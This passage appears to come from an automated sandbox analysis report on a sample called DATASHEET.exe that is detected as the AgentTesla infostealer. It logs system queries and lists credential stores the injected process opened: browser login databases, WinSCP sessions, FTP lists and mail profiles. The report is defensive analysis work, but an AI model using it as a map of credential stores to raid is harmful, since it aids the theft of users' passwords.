                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeQueries volume information: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\DATASHEET.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d32700.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d6d320.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d6d320.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1805867621.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1805867621.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DATASHEET.exe PID: 7336, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7808, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3608, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d32700.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d6d320.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d6d320.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1805867621.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DATASHEET.exe PID: 7336, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7808, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3608, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d32700.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d6d320.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d6d320.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.DATASHEET.exe.3d32700.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4156832701.000000000331B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1805867621.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
